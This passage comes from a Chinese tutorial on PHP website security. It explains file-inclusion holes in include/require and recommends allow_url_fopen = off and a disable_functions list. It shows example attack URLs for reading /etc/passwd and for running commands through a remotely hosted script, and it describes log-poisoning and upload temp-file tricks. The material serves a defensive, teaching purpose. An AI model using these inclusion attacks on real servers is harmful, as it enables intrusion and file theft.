PHP网站开发过程中注意这些安全知识(2)

extra_cmd=NULL

然后重新编译。

3、UNIX版的require, include函数

win版本的require和include函数是不支持HTTP和FTP远程文件包含的，而UNIX版本默认都是支持远程包含文件。

require和include不管你是什么扩展名的，把你包含进来就作为程序的一部分来执行。

我们在写程序的时候为了程序的模块化，以及程序的可移植性，不可避免的用到很多require或include函数，而且有时用变量作为参数，比如：include("$something"); 如果这时用户能控制$something参数，而这个参数又没有过滤，那就惨拉。

首先可以看任何web用户有读权限的文件，假设这个程序叫http://victim/test.php，这样我们就可以用如下

url: http://victim/test.php?something=/etc/passwd 看到/etc/passwd文件。

另外可以利用其远程文件包含的功能执行命令。比如我在www.AAA.org下建立一个文件test.php，内容是：

，那么我就可以用如下的url:

http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname这种方式运行任

意的命令。

phpMyAdmin也出现了这个问题，我们可以用它看任何我们想看的文件。但是它在include前，先用file_exist函数判断文件是否存在，而这个file_exist是不支持远程文件的，所以上面第二种办法无法直接使用。但是我们可以利用apache的日志功能，请求一个带php代码的url，这样，something指定为apache的日志也可以执行命令了，但是apache的日志通常比较大，有太多杂乱信息。

http://www.securereality.com.au/sradv00008.txt提到的办法比较巧妙，用file upload的方式把本地的执行命令的脚本上传，会在服务器的文件上传临时目录里产生php8Ta02I之类的文件名，由于这时文件是存在的，所以能通过file_exist函数，从而执行上传文件里的执行脚本。

所以对于include, require函数的使用一定要小心，特别是以包含的文件以参数指定这种方式，参数绝对不能让用户来控制。还有通过修改php.ini文件去掉远程文件包含这个功能。这个在php-4.0.3以前用disable-url-fopen-wrapper 在以后的版本用allow_url_fopen = off来关闭。

4、disable_function

在php-4.0.1，php.ini里引入了一项功能disable_functions , 这个功能比较有用，可以用它禁止一些函数。

比如在php.ini里加上disable_functions = passthru exec system popen 那么在